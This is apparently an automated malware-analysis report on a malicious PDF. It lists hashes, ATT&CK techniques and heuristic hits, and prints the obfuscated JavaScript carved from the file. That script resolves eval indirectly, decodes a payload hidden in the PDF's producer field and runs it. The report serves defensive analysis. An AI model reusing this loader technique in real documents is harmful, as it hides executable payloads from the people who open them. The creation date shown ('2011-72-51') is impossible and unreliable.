PDF malware analysis — malicious · 7a377b1ac5f7c436

MALICIOUS

PDF

25.1 KB Created: 2011-72-51 03:25:00

MD5: 637d5d7e2c8c32356b4eb481bbab2c21 SHA-1: 5ba661820a93a21fa69be5fa57efffe443db16d4 SHA-256: 7a377b1ac5f7c4368521cc58c141a220f38e0de1aeb31056cdaa229e708abeb4

114 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript, identified by heuristics like PDF_JAVASCRIPT and PDF_JS_EXPLOIT_CLUSTER. The JavaScript code appears to be obfuscated but ultimately calls a function that likely executes a payload. The ML classifier strongly indicates maliciousness. The specific exploit and payload are not fully discernible due to obfuscation, but the pattern suggests a downloader or dropper.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js
7e14b2941f372e011cc96ced30dd74b970369ac9c723c3b6f8b3d50601771b4e pdf-javascript-stream PDF /JS object 1 at offset 0x6212 364 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js` `7e14b2941f372e011cc96ced30dd74b970369ac9c723c3b6f8b3d50601771b4e`	pdf-javascript-stream	PDF /JS object 1 at offset 0x6212	364 bytes
Preview script First 1,000 lines of the extracted script var qweval=5; for(var i in this) { if (i.indexOf('qwe') != -1) { kchz=this[i.replace('qw','')]; } } kchz('fizw=this.producer'); wsslj=kchz(fizw.substr(0,19)); fizw = fizw.substr(19); fizw = fizw.replace(/t/g,'2'); ar = fizw.split('q'); var s = ''; w = 4; for (i = 0; i < ar.length; i++) { nskp = kchz(ar[i]); s += wsslj(nskp); } kchz(s);

Preview script

First 1,000 lines of the extracted script

var qweval=5;
for(var i in this) {
	if (i.indexOf('qwe') != -1) {
		kchz=this[i.replace('qw','')];
	}
}
kchz('fizw=this.producer');
wsslj=kchz(fizw.substr(0,19));
fizw = fizw.substr(19);
fizw = fizw.replace(/t/g,'2');
ar = fizw.split('q');
var s = '';
w = 4;
for (i = 0; i < ar.length; i++) {
	nskp = kchz(ar[i]);
	s += wsslj(nskp);
}
kchz(s);

Open this report in the interactive analyzer, or submit your own file for analysis.